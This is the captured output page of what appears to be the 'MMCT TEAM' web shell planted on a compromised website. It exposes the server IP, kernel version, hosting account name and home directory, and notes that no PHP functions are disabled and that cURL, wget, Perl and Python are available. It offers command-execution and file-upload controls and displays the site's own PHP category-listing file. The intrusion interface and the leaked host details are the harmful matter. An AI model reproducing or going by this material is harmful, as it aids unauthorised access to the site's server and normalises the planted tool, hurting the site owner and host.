MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 18.219.47.239
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/parthaquafresh.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/parthaquafresh.com/index-category.php
<?php
$top_sql=db_query("select * from tbl_category where category_for_home='Yes' and category_status='Active'  and category_parent_id=0  order by category_order_by asc limit 4");
if(mysqli_num_rows($top_sql)>0)
{
?>
<section class="categories-area pb-40">
<div class="container">
<div class="section-title">
<h2>Categories</h2>
</div>
<div class="row">

<?php
while($top_res=mysqli_fetch_array($top_sql))
{
?>

<div class="col-lg-3 col-sm-4 col-md-4 change_color_hover">
 <div class="single-categories-box geeks">
<img src="<?=$site_url?>/uploaded_files/<?=$top_res['category_image_name']?>" alt="<?=$top_res['category_name']?>" title="<?=$top_res['category_name']?>">
<h3><?=$top_res['category_name']?></h3>
<a href="<?=$site_url?>/products/<?=$top_res['category_url']?>.html" class="link-btn"></a>
</div>
</div>
<?}?>

</div>
</div>
</section>

<?}?>

MMCT - 2023